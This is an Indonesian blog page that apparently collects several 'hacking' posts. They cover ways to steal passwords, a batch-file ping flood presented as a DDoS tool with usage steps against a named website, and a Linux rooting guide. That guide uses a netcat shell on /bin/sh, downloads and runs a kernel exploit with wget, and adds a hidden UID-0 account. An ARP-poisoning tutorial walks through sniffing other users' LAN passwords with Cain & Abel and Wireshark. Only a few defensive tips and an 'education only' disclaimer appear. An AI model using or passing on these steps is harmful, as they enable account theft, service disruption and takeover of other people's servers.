Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Bebagai Cara Membajak Password


Ada banyak cara untuk mendapatkan suatu password / membajak password / crack password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan :
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling
[10]. Phising

[1]. Social Engineering
Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai ‘penipuan’ Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.
Social Engineering merupakan seni ‘memaksa’ orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja ‘pemaksaan’ yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya, tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
[2]. KeyLogger
KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
[5]. Password Cracking
‘Hacking while sleeping.’ itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.
[6]. Session Hjacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
‘HACKED’, ‘DEFACED’, ‘OWNED’.. dll..
Jika ragu-ragu……. reject ajah..
3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fiturbrowser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools — Internet options — Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file ‘sampah’?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager. Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools — Options — Security – Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi ‘YES’.
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya (It’s fun enough..
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling
Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, ‘si pintar’ ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. ‘taman bermain’ anda akan diambil alih olehnya..
[10] Phising
Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN, nomor rekening, nomor kartu kredit Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah
Aksi ini semakin marak terjadi. Tercatat secara global, jumlah penipuan bermodus phising selama Januari 2005 melonjak 42% dari bulan sebelumnya. Anti-Phishing Working Group (APWG) dalam laporan bulanannya, mencatat ada 12.845 e-mail baru dan unik serta 2.560 situs palsu yang digunakan sebagai sarana phishing.
Selain terjadi peningkatan kuantitas, kualitas serangan pun juga mengalami kenaikan. Artinya, situs-situs palsu itu ditempatkan pada server yang tidak menggunakan protokol standar sehingga terhindar dari pendeteksian
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
  • Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit
  • Membuat situs palsu yang sama persis dengan situs resmi.atau . pelaku phishing mengirimkan e-mailyang berisikan link ke situs palsu tersebut.
  • Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.

Tutorial Sniffing Jaringan

Tutorial Sniffing Jaringan
Kali ini, Kang Lephex akan memberikan sedikit tutorial tentang cara Sniffing Jaringan menggunakan tool Cain & Able.
so, Check this Out...

Siapkan Tool :
1. PC yang Terhubung dengan Jaringan, minimal LAN


Yups.., sudah siap..??
langsung kita mulai saja tutorialnya

Install Cain and Able, anda akan membutuhkan Wincap dalam menginstall, bila anda sudah pernah menginstall software yang memerlukan wincap, anda tidak perlu menginstallnya lagi.

Jalankan software Cain and Able-nya
tampilan awal CA

Selanjutnya, kita perlu mengkonfigurasi software ini dengan Hardware kita, klik Configure -Pilih IP address yang koneksi dengan computer lain. Kemudian klik Apply dan OK

lalu klik Tutorial Sniffing Jaringan untuk mengaktifkan Cain & Able

Selanjutnya klik Tombol + yang ada di toolbar. Ini berfungsi mencari MAC Address atau alamat computer yang terkoneksi dalam jaringan. lalu Klik OK

Lalu akan muncul Mac addressnya.
klik tombol APR yang ada di bagian bawah ( di gambar yang warna kuning), dan akan muncul jendela baru
Tutorial Sniffing Jaringan

Klik no IP server yang di sebelah kiri (biasanya IP Addressnya berakhiran 1, contoh : 192.168.10.1) lalu akan muncul IP di table sebelah kanan. Blok semua IP tersebut dan klik OK.

Aktifkan APR dengan klik tanda bulat warna kuning di bagian atas toolbar. Maka akan muncul status baru di table bawah, jika berwarna hijau maka ada yang koneksi dengan internet. Kalau tidak, selanjutnya adalah kita masuk ke jendela password dengan klik tab Password yang ada di bagian bawah.

Lalu tinggal tunggu saja, dan sekali-sekali di Refresh yah..,
setiap target membuka web yang membutuhkan password, kita bisa mendapatkan password tersebut.

sumber : http://lephex.blogspot.com/2012/02/tutorial-sniffing-jaringan.html

DDOS Menggunakan Notepad

DDOS Menggunakan Notepad

Kali ini Liyenn Rizqi akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:
Copy code-code dibawah ini :

Code:

    @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2:
Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3:
Save file anda seperti dibawah :

File Name : DDoS Attack.bat
Save As Type : All File <--- PENTING

    Quote: bisa disave dgn namafile bebas sesuka bro n sist..
    tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target:
Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :
    Sebelum = http://www.google.com/
    Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.
    Setelah memasukkan url itu, tekan enter.


LANGKAH 4:
Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- IP address bagi http://www.google.com

    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host:
Masukkan saja ip address yg anda dapat tadi.

Contoh :
ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size :
Letakkan letakkan semau anda sebagai POWER !

Contoh :
Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.
   
Sumber : http://hendromardika.blogspot.com/2012/08/ddos-menggunakan-notepad.html

Cara Mendapatkan Akses Root Pada Server Linux

Tulisan ini hanya untuk pembelajaran belaka terutama buat pada Admin Server. Dengan mengetahui tekhnik rooting yang dilakukan oleh defacer, diharapkan sang Admin bisa lebih meningkatkan keamanan pada servernya. Cyber4rt tidak bertanggung jawab atas apa yang terjadi setelah membaca tulisan ini!

Linux adalah sebuah sistem yang secure, tapi jangan lupa ini buatan manusia, pasti ada saja kelemahan dari sistem itu, entah karena si Admin yang kurang handal dalam konfigurasi atau memang telah di temukan bugs pada sistem itu. Itulah mengapa Developer Linux membuat versi update untuk memperbaiki bugs - bugs yang terdapat pada sistem itu.

Apa itu root pada Linux ?

Root adalah nama user atau account yang secara default memiliki akses penuh ke semua perintah dan file pada sistem mirip Unix operasi Linux atau lainnya.

Bagaimana tekhnik mendapatkan Root pada server Linux?

Untuk bisa mendapatkan root, langkah pertama yang harus dilakukan adalah mendapatkan user biasa. Ini bisa dilakukan dengan melakukan injection ke sebuah situs, tapi untuk mengetahui situs yang memiliki kelemahan maka biasanya defacer melakukan scanning situs - situs yang terdapat vurnerability di sistemnya. Metode yang digunakan bisa RFI (Remote File Inclussion), LFI (Local File Inclussion) dan masih banyak metode lain.

Q : bagaimana cara scanning-nya???
A : untuk bisa scanning anda bisa melakukan koneksi ke server IRC yang menyediakan bot untuk scanning situs yang memiliki vurnerability atau dengan memanfaatkan Google Dork

Q : kasi tau donk IRC servernya???
A : Googling...zzZzzzzZ

Di sini kita beranggapan bahwa defacer sudah memasuki sistem lewat teknik - teknik yang ada di atas. Sekarang backdoor sudah terpasang di server target dan siap di jalankan oleh netcat dengan perintah berikut:

./nc -lvp 5050  -e /bin/sh

kemudian dari komputer defacer menjalankan Netcat (harus sudah terinstall di komputer) dengan perintah berikut :

./nc -v ip_server_target  5050

Setelah itu defacer mengetik:

uname -a

Maka akan muncul hasilnya kira - kira seperti ini (contoh) :

Linux blackbox 2.6.18-194.8.1.el5.028stab070.2 #1 SMP Tue Jun 18 02:30:59 MSD 2010 x86_64 GNU/Linux

Bagian yang perlu diperhatikan adalah 2.6.18-194. Ini adalah versi Kernel dari Linux yang sedang di jalankan. 
Langkah selanjutnya yang akan dilakukan oleh sang defacer adalah mencari bugs pada kernel tersebut  di berbagai situs - situs exploiter/injector. Setiap kernel memiliki bugs tersendiri. Misalnya saja sang defacer telah mendapatkan exploit kernel tersebut, maka dilanjutkan dengan mengetikkan beberapa sintaks-nya sebagai berikut (contoh) :

wget http://www.SitusExploiter.com/2.6.18-194.tgz
tar -xvzf 2.6.18-194.tgz
cd 2.6.18-194
./2.6.18-194.sh

Setelah melakukan beberapa contoh sintaks di atas, maka defacer pastinya ingin mengetahui keberhasilan tekhnik mendapatkan akses root dengan mengetik:

id
atau
whoami

Jika hasilnya root maka anda telah berhasil merebut akses root pada server tersebut. Lihat contoh gambar:

Tekhnik Mendapatkan Root Pada Server Linux

Setelah mendapatkan akses root biasanya defacer menambahkan New User Root Account. Sebagai contoh untuk menambahkan akses root dengan user "Cyber4rt" gunakan perintah berikut:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Cyber4rt

ket:
adduser : perintah dasar Linux untuk menambahkan user

-u 0 -o : set user menjadi dengan ID nol (0) root.

-g 0 : Set initial group dengan ID nol (0) root.

-G 0,1,2,3,4,6,10 : Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M : "home directory" tidak di create ke user.

Cyber4rt - User name of the new user account.

Untuk melakukan set password pada user yang telah kita buat, perintahnya :

passwd NamaUser

Demikian sedikit teknik yang dapat dilakukan untuk mendapatkan akses Root pada server Linux. Semoga bermanfaat bagi kita semua khususnya para Admin Server.

Mengintip Aktifitas Orang Lain Melalui Jaringan

Seiring perkembangan jaman dan teknologi, para hacker sering melakukan aktifitas yang kreatif dengan ide-ide cemerlang.

Berikut adalah video cara hacker nge-hack lewat jaringan, mengintip aktifitas seseorang melalui jaringan...!!! Hati-hati bisa jadi suatu saat Anda yang di intip :p






Itulah tadi sedikit tontonan video Mengintip Aktifitas Orang Melalui Jaringan. Semoga video tersebut bisa lebih meningkatkan kewaspadaan kita saat browsing internet pada suatu jaringan tertentu. Sekian dan terima kasih, semoga bermanfaat bagi kita semua.

Mengintip Password Dalam Satu Jaringan (Man In The Middle Attack)

Bagaimana cara hacking via LAN (mengintip password orang yang lagi browsing) ? Pertama-tama maaf kalau repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?
  • Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
  • Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error.
  • Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch :
  • Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
  • Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:

1. Sniffing
2. ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda.

Kelebihan:
  • Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya.
  • Bisa mencuri semua jenis login password yang melalui server HTTP.
  • Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan.
  • Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS.
  • Semua programnya free
Kekurangan:
  • Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat tidak masalah).
  • Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kasus ini ada 3 komputer, yaitu:
  1. Komputer Korban
  2. Komputer Hacker
  3. Server
Perbedaan-perbedaan antara jaringan Switch dan jaringan Hub :

Langkah-langkah pertama:
  1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
  2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Cara Menggunakan WireShark:
  1. Jalankan program Wireshark
  2. Tekan tombol Ctrl+k (klik capture lalu option)
  3. Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa "Capture packets in promiscuous mode" on
  4. Klik tombol start 
  5. Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start 
  6. Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
  7. Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik "Follow TCP Stream" dan selamat menganalisis paketnya

    klik untuk memperbesar gambar
    Yang jelas dari data itu pasti di dalamnya terdapat informasi yang dimasukkan korban ke website dan sebaliknya
nb: cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch

Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain & Abel :

Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan Wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program Wireshark
  1. Buka program Cain & Abel anda
  2. Klik pada bagian configure 
  3. Pada bagian "Sniffer" pilih ethernet card yang akan anda gunakan
  4. Pada bagian "HTTP Fields" anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
    Sebagai contoh saya akan beritahukan bahwa jika anda ingin hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut.
  5. Setelah itu apply settingannya dan klik ok
  6. Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab "Sniffer" karena itu pilih lah tab tersebut dan jangan pindah dari tab tersebut untuk mencegah kebingungan anda sendiri
  7. Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab-tab tersebut, carilah tombol yang tulisannya "Start/Stop Sniffer" 
  8. Bila anda berada pada jaringan Hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) "Passwords" 
  9. Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
  10. Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap & secure daripada hub)
  11. Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR 
  12. Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol "+" (bentuknya seperti itu) yang ada di jajaran tombol sniffer APR, dll
  13. Akan ada 2 buah field yang berisi semua host yang ada pada jaringan anda
  14. Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komputer anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
  15. Setelah itu baru aktifkan APR, dan semua data dari komputer korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah-langkah yang jauh lebih panjang dari cara yang telah dijelaskan di atas)

Untuk istilah-istilah yang tidak Anda mengerti bisa Anda cari di Wikipedia.

Hacking WPA / WPA2 Dalam 1 Menit

Hacking WPA / WPA2 Dalam 1 Menit

Cara yang cukup ampuh untuk menembus keamanan wireless WPA/WPA2 dalam waktu kurang lebih 1 menit. Langsung saja kita tonton videonya di bawah ini :




Bagi yang ingin berkomentar silakan menuju ke http://www.facebook.com/photo.php?v=351316854930863

By Irwan Prakoso

Mempercepat Koneksi Internet "Speed Firefox"


Dalam artikel ini saya akan menjelaskan cara atau langkah untuk Mempercepat Koneksi Internet "Speed Firefox" pada komputer Anda,seperti biasa saya tak akan berbelit-belit dan ngomong terlalu panjang lebar,
Silahkan Anda ikuti langkah-langkah yang saya posting di bawah ini.

 Langkah Mempercepat Koneksi Internet "Speed Firefox" :

  • Aktifkan browser Firefox-3.0 Anda dan ketikkan perintah “about:config” (tanpa tanda kutip), di address barnya.
  • Anda akan dibawa ke halaman konfigurasi Firefox-3.0. Kalau ada peringatan untuk hati-hati mengubah pengaturan pada halaman tersebut, klik yes atau ok saja.
  • Pada filter search bar di halaman konfigurasi, ketikkan “network.http.pipelining”. Pastikan valuenya sudah diset dengan nilai “true”. Jika masih “false”, klik ganda untuk menjadikannya “true”.
  • Kembali ke filter search bar, ketikkan “network.http.pipelining.maxrequests”. Double klik pada opsi ini dan rubah nilainya (value) menjadi 8.
  • Kembali ke filter search bar, ketikkan “network.http.proxy.pipelining”, double klik untuk merubah valuenya menjadi ‘true’.
